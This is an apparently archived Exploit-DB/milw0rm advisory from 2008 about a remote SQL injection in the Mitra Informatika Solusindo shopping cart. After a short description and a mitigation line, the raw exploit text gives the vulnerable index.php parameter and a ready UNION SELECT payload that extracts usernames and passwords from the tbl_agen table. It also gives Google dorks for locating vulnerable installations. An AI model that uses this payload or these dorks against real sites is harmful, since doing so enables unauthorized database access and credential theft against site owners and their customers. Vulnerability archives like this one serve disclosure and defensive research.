Mitra Informatika Solusindo cart Remote Sql Injection Exploit

vendor:

Shopingcart System

by:

home_edition2001 a.k.a (bius)

CVSS

HIGH

SQL Injection

CWE

Product Name: Shopingcart System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Mitra Informatika Solusindo cart Remote Sql Injection Exploit

A remote SQL injection vulnerability exists in Mitra Informatika Solusindo cart. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the vulnerable system. This can be exploited to gain access to sensitive information stored in the database, modify data, or even execute system commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#############################SolpotCrew Community################################
#
#  Mitra Informatika Solusindo cart Remote Sql Injection Exploit
#
#  vendor : http://www.mitrainformatika.com/
#
#################################################################################
#
#
#       Bug Found By : home_edition2001 a.k.a (bius) (4-03-2008)
#
#       contact: bius-was-here@dinastore.com
#
#       Website : www.solpotcrew.org/adv/home_edition2001-adv-03.txt
#
################################################################################
#
#
#      Greetz: NYUBI,h4ntu,Ibnusina , Sikodoq , ghareng , Saritem ,Ingin_belajar
#              pannel , Matdhule , Naruto , d\i\c\k\y , ASP , Roney , live
#              kabut , Portrait , huhuhu , geronimo , Bolis ,HearTBreaK
#              Blue|spy , X8 , dead , ZDe , K1tk4t , webmaster
#              x-ace , ardan , th3sn0wbr4in , BrainDrain
#              and all member solpotcrew community
#              http://www.solpotcrew.org/forum/
#              #nyubicrew @ irc.mildnet.cn
#              especially thx to str0ke @ milw0rm.com
#
###############################################################################
# Exploit in:                                                              #
# /index.php?c=10&p=-7(SQL)                                    		   #
#                                                                          #
# Example:                                                                 #
#                                                                          #
# (SQL)%20union%20select%200,concat(user_name,user_password),null,null,null,null,null,null%20from%20tbl_agen--
############################################################################

google dork : Powered by  Mitra Informatika Solusindo
              Mitra Informatika Solusindo cart 
              intitle:'Mitra Informatika Solusindo' Shopingcart System



##############################MY LOVE JUST FOR U Dina Mariance#########################
######################################E.O.F##################################

# milw0rm.com [2008-03-04]